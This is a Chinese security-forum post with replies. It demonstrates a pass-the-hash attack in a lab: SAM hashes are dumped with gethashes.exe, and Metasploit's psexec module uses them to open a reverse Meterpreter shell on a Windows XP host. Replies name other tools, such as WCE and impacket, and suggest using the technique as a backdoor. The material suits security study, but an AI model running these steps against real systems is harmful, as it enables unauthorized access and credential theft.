当前位置:WooYun(白帽子技术社区) >> 渗透测试 >> 使用Hash直接登录Windows

使用Hash直接登录Windows

VIP (Fatal error: Call to undefined function getwb() in /data1/www/htdocs/106/wzone/1/index.php on line 10|@齐迹@小胖子@z7y@nauscript|昨晚做梦梦见了一个ecshop注射0day,醒来后忘记在哪了。|预留广告位) | 2012-09-10 16:13

首先,在本地主机(假设为目标主机)
新建一个isosky用户,并为之设置密码,然后通过gethashes.exe获取到HASH


C:\>net user isosky test
The command completed successfully.


C:\>gethashes.exe $local
1:1007:C2265B23734E0DACAAD3B435B51404EE:69943C5E63B4D2C104DBBCC15138B72B:::
Administrator:500:0A174C1272FCBCF7804E0502081BA8AE:83F36A86631180CB9F5F53F5F45DF
B2B:::
Guest:501:AAD3B435B51404EEAAD3B435B51404EE:31D6CFE0D16AE931B73C59D7E0C089C0:::
HelpAssistant:1000:CF88594C2AC20629EEF3D6DABD2DA92D:0FCE98570CBB9C14E8FF200353B2
707B:::
isosky:1003:01FC5A6BE7BC6929AAD3B435B51404EE:0CB6948805F797BF2A82807973B89537:::

SUPPORT_388945a0:1002:AAD3B435B51404EEAAD3B435B51404EE:F9E8AE6C7229EA07EFAC12715
F954B83:::
__vmware_user__:1006:AAD3B435B51404EEAAD3B435B51404EE:915D1CEE456EA4DD6A8094F7CE
094448:::

C:\>

然后我再返回我的BT虚拟机(攻击者主机)使用MSF进行测试,MSF自带的PSEXEC模块具有HASH传递攻击功能

root@bt:~# msfconsole

                ##                          ###           ##    ##
##  ##  #### ###### ####  #####   #####    ##    ####        ######
####### ##  ##  ##  ##         ## ##  ##    ##   ##  ##   ###   ##
####### ######  ##  #####   ####  ##  ##    ##   ##  ##   ##    ##
## # ##     ##  ##  ##  ## ##      #####    ##   ##  ##   ##    ##
##   ##  #### ###   #####   #####     ##   ####   ####   #### ###
                                      ##


       =[ metasploit v3.7.0-release [core:3.7 api:1.0]
+ -- --=[ 684 exploits - 355 auxiliary
+ -- --=[ 217 payloads - 27 encoders - 8 nops
       =[ svn r12536 updated 76 days ago (2011.05.04)

Warning: This copy of the Metasploit Framework was last updated 76 days ago.
         We recommend that you update the framework at least every other day.
         For information on updating your copy of Metasploit, please see:
             http://www.metasploit.com/redmine/projects/framework/wiki/Updating

msf > use exploit/windows/smb/psexec
msf exploit(psexec) > show options

Module options (exploit/windows/smb/psexec):

   Name       Current Setting  Required  Description
   ----       ---------------  --------  -----------
   RHOST                       yes       The target address
   RPORT      445              yes       Set the SMB service port
   SHARE      ADMIN$           yes       The share to connect to, can be an admi                                              n share

(ADMIN$,C$,...) or a normal read/write folder share
   SMBDomain  WORKGROUP        no        The Windows domain to use for authentic                                              ation
   SMBPass                     no        The password for the specified username
   SMBUser                     no        The username to authenticate as


Exploit target:

   Id  Name
   --  ----
   0   Automatic


msf exploit(psexec) > set RHOST 192.168.0.254
RHOST => 192.168.0.254
msf exploit(psexec) > set SMBUser isosky
SMBUser => isosky
msf exploit(psexec) > set SMBPass 01FC5A6BE7BC6929AAD3B435B51404EE:0CB6948805F797BF2A82807973B89537                                            

SMBPass => 01FC5A6BE7BC6929AAD3B435B51404EE:0CB6948805F797BF2A82807973B89537
msf exploit(psexec) > show options

Module options (exploit/windows/smb/psexec):

   Name       Current Setting                                                                                                  Required

Description
   ----       ---------------                                                                                                  --------  -----

------
   RHOST      192.168.0.254                                                                                                    yes       The

target address
   RPORT      445                                                                                                              yes       Set

the SMB service port
   SHARE      ADMIN$                                                                                                           yes       The

share to connect to, can be an admin share (ADMIN$,C$,...) or a n                                              ormal read/write folder share
   SMBDomain  WORKGROUP                                                                                                        no        The

Windows domain to use for authentication
   SMBPass    01FC5A6BE7BC6929AAD3B435B51404EE:0CB6948805F797BF2A82807973B89537                                                no        The

password for the specified username
   SMBUser    isosky                                                                                                           no        The

username to authenticate as


Exploit target:

   Id  Name
   --  ----
   0   Automatic


msf exploit(psexec) > exploit

[*] Started reverse handler on 192.168.0.3:4444
[*] Connecting to the server...
[*] Authenticating to 192.168.0.254:445|WORKGROUP as user 'isosky'...
[*] Uploading payload...
[*] Created \UGdecsam.exe...
[*] Binding to 367abb81-9844-35f1-ad32-98f038001003:2.0@ncacn_np:192.168.0.254[\svcctl] ...
[*] Bound to 367abb81-9844-35f1-ad32-98f038001003:2.0@ncacn_np:192.168.0.254[\svcctl] ...
[*] Obtaining a service manager handle...
[*] Creating a new service (MZsCnzjn - "MrZdoQwIlbBIYZQJyumxYX")...
[*] Closing service handle...
[*] Opening service...
[*] Starting the service...
[*] Removing the service...
[*] Closing service handle...
[*] Deleting \UGdecsam.exe...
[*] Sending stage (749056 bytes) to 192.168.0.254
[*] Meterpreter session 1 opened (192.168.0.3:4444 -> 192.168.0.254:1877) at 2011-07-19 03:57:17 +0800

meterpreter > sysinfo
Computer        : ISOSKY-PC
OS              : Windows XP (Build 2600, Service Pack 2).
Architecture    : x86
System Language : zh_CN
Meterpreter     : x86/win32
meterpreter > shell
Process 4596 created.
Channel 1 created.
Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.

C:\WINDOWS\system32>net user
net user

User accounts for \\

-------------------------------------------------------------------------------
__vmware_user__          1                        Administrator
Guest                    HelpAssistant            isosky
SUPPORT_388945a0
The command completed with one or more errors.


C:\WINDOWS\system32>

至此,我们已经成功获得目标的CMDSHELL

分享到:
38 个回复
  1. 1#
    回复此人 感谢
    xsser (十根阳具有长短!!) | 2012-09-10 16:30

    good!

  2. 2#
    回复此人 感谢
    小胖子 (z7y首席代言人,园长的表哥...) | 2012-09-10 16:38

    流逼!!!!

  3. 3#
    回复此人 感谢
    xsjswt | 2012-09-10 16:45

    nb

  4. 4#
    回复此人 感谢
    popok (我是你们的大爷)‮(宗祖的们你是我) | 2012-09-10 17:04

    这个可以在破解不了管理密码的情况下,作为后门使用,当然前提是管理不改密码

  5. 5#
    回复此人 感谢
    popok (我是你们的大爷)‮(宗祖的们你是我) | 2012-09-10 17:05

    当然能拖出hash的前提是你已经有了足够的shell权限

  6. 6#
    回复此人 感谢
    phantom | 2012-09-10 18:14

    那个啥 smb_login扫描也可以用HASH的 你们懂的吧

  7. 7#
    回复此人 感谢
    beastk | 2012-09-10 18:21

    good job!

  8. 8#
    回复此人 感谢
    VIP (Fatal error: Call to undefined function getwb() in /data1/www/htdocs/106/wzone/1/index.php on line 10|@齐迹@小胖子@z7y@nauscript|昨晚做梦梦见了一个ecshop注射0day,醒来后忘记在哪了。|预留广告位) | 2012-09-10 18:26

    @phantom

  9. 9#
    回复此人 感谢
    phantom | 2012-09-10 19:32

    @xsjswt @popok @beastk @VIP @beastk @xsser @phantom 曾经的phantom0318很流弊的 提交了N多modules 为此放弃了c玩起了ruby 梦想着有一天能被rapid聘走 哎苦逼的命啊

  10. 10#
    回复此人 感谢
    upload (Van Helsing) | 2012-09-10 19:51

  11. 11#
    回复此人 感谢
    possible (everything is possible) | 2012-09-10 19:53

    膜拜 膜拜 求gethashes.exe  谢谢

  12. 12#
    回复此人 感谢
    VIP (Fatal error: Call to undefined function getwb() in /data1/www/htdocs/106/wzone/1/index.php on line 10|@齐迹@小胖子@z7y@nauscript|昨晚做梦梦见了一个ecshop注射0day,醒来后忘记在哪了。|预留广告位) | 2012-09-10 20:01

    @possible  http://ishare.iask.sina.com.cn/f/11062530.html

  13. 13#
    回复此人 感谢
    z7y (小胖子首席鉴黄师) | 2012-09-10 21:07

    @VIP 这个百度看过,没弄明白怎么操作的~~求实战教程!

  14. 14#
    回复此人 感谢
    upload (Van Helsing) | 2012-09-10 21:39

    msf  exploit(psexec) > exploit

    [*] Started reverse handler on 192.168.126.145:4444
    [*] Connecting to the server...
    [*] Authenticating to 192.168.1.101:445|WORKGROUP as user 'admin'...
    [*] Uploading payload...
    [*] Created \hNYJSGTP.exe...
    [*] Binding to 367abb81-9844-35f1-ad32-98f038001003:2.0@ncacn_np:192.168.1.101[\svcctl] ...
    [*] Bound to 367abb81-9844-35f1-ad32-98f038001003:2.0@ncacn_np:192.168.1.101[\svcctl] ...
    [*] Obtaining a service manager handle...
    [*] Creating a new service (KynvIEUS - "MQblTXXcKydwALAIeRwWAbcQCvFrOrB")...
    [*] Closing service handle...
    [*] Opening service...
    [*] Starting the service...
    [*] Removing the service...
    [*] Closing service handle...
    [*] Deleting \hNYJSGTP.exe...
    [*] Exploit completed, but no session was created.
    杯具。。。

  15. 15#
    回复此人 感谢
    Metasploit (www.metasploit.cn) | 2012-09-11 10:26

    不错 比较详细

  16. 16#
    回复此人 感谢
    hongygxiang (屌丝,纯屌!) | 2012-09-11 11:52

    碉堡

  17. 17#
    回复此人 感谢
    B1n4ry (苦逼的生存着。。。) | 2012-09-11 14:13

    这是很肥美的鸡肋!

    BTW,windows下用WCE来注入远程hash,获取远程认证。之后也可以通过PSEXEC来执行命令。或者通过IPC$通道,利用at执行bat。

  18. 18#
    回复此人 感谢
    lossite | 2012-09-12 07:31

    @phantom +1

  19. 19#
    回复此人 感谢
    piaoye (123) | 2012-09-12 08:07

    这是所谓的逆向攻击么?

  20. 20#
    回复此人 感谢
    possible (everything is possible) | 2012-09-12 17:11

    @VIP 谢谢了 这个需要目标开启共享吧

  21. 21#
    回复此人 感谢
    ttvip11 | 2012-09-17 21:23

    wce 不是有哈希注入的功能吗。。。。。。。

  22. 22#
    回复此人 感谢
    c4bbage (天津 祈福) | 2012-09-17 23:00

    @phantom 搞掉windows7的账户密码了,但是不能突破uac 建立交互shell,psexec /smb/psexec Keimpx 均失败,求论证,讨论,实践。

  23. 23#
    回复此人 感谢
    J4nker | 2012-09-30 07:36

    这个不错呀。。。

  24. 24#
    回复此人 感谢
    冷冷的夜 (1) | 2012-10-08 00:50

    wce -s

  25. 25#
    回复此人 感谢
    yingzi | 2012-10-10 22:25

    一般能抓到hash的,都能破解

  26. 26#
    回复此人 感谢
    GaRY | 2012-10-11 12:32

    这是个不错的tips,很实用

  27. 27#
    回复此人 感谢
    八云幽紫 | 2012-12-14 23:45

    NICE!很实用啊!

  28. 28#
    回复此人 感谢
    店小弎 | 2012-12-15 12:19

    前提必须开445端口   假如知道 密码的话        135开个话 完全可以开个telnet

  29. 29#
    回复此人 感谢
    saber (终极屌丝之路~) | 2012-12-15 12:30

    貌似WCE就可以利用hash啊

  30. 30#
    回复此人 感谢
    菜菜来报道 | 2013-02-26 09:26

    学习学习

  31. 31#
    回复此人 感谢
    xfkxfk | 2013-02-28 17:10

    为什么我的不行呢?悲剧,不知道为什么。。。
    Exploit failed [no-access]: Rex::Proto::SMB::Exceptions::ErrorCode The server responded with error: STATUS_ACCESS_DENIED

  32. 32#
    回复此人 感谢
    icErainow | 2013-10-29 20:08

    http://www.rapid7.com/db/modules/exploit/windows/smb/psexecs
    上个世纪的漏洞了,应该已经没用了

  33. 33#
    回复此人 感谢
    tmp | 2013-10-29 22:42

    @VIP @GaRY @xsser @all 其实我只想说metasploit太笨重了.不适合杀人放火.如果只是简单想通过hash获取shell. 用core公司的impacket包.里面的psexec.py 就可以简单实现.一条命令搞定. 小我 感兴趣的话.可以去看看impacket包.里面都是python实现

  34. 34#
    回复此人 感谢
    Metasploit (www.metasploit.cn) | 2013-10-29 23:01

    @tmp core不是一般公司能买得起的呀,四五十万呢

  35. 35#
    回复此人 感谢
    tmp | 2013-10-29 23:54

    @Metasploit 你错了...我说的core不是你想的哪个core impacket exp集成平台.是core 公司开源的 impacket包...自己去搜

  36. 36#
    回复此人 感谢
    tmp | 2013-10-29 23:55

    @Metasploit 你直接 gg impacket psexec.py

  37. 37#
    回复此人 感谢
    s4msung ([email protected]) | 2013-10-30 09:01

    有点年份的东西了


    msvctl v0.3 by Johannes Gumbel ([email protected])                                                                                          
    msvctl help (default)                                                      
    msvctl list                                                                
    msvctl del <luid>                                                          
    msvctl [<domain>\<user>] [lm <lm hash>] [ntlm <ntlm hash>] set <luid>      
    msvctl <domain>\<user> [lm <lm hash>] [ntlm <ntlm hash>] add <luid>        
    msvctl <domain>\<user> [lm <lm hash>] [ntlm <ntlm hash>] run <cmd> ...                                                                                
    user@domain is equal to domain\user                                        
    xxx:yyy is equal to lm xxx ntlm yyy                                        
    xxx: is equal to lm xxx                                                    
    :yyy is equal to ntlm yyy                                                  
    a:b:c:d::: is equal to "a@ lm c ntlm d" (pwdump style)                      
    note: the last three ':' are optional                                      
    note: if username is of form user(xxx) the (xxx) is stripped                                                                                        
    if no domain is provided it defaults to WORKGROUP

  38. 38#
    回复此人 感谢
    Forever80s (~~~~~~~~) | 2013-11-02 22:01

    不错,msf好强的啊

  39. 39#
    回复此人 感谢
    blacksun | 2014-05-31 19:16

    我希望大牛们多给我们这些菜鸟加点注释,看得好费劲。。。求响应

添加新回复

登录 后才能参与评论.

WooYun(白帽子技术社区)

网络安全资讯、讨论,跨站师,渗透师,结界师聚集之地

登录

其它内容


Copyright © 2010 www.wooyun.org All Rights Reserved. 吉ICP备12001400号-1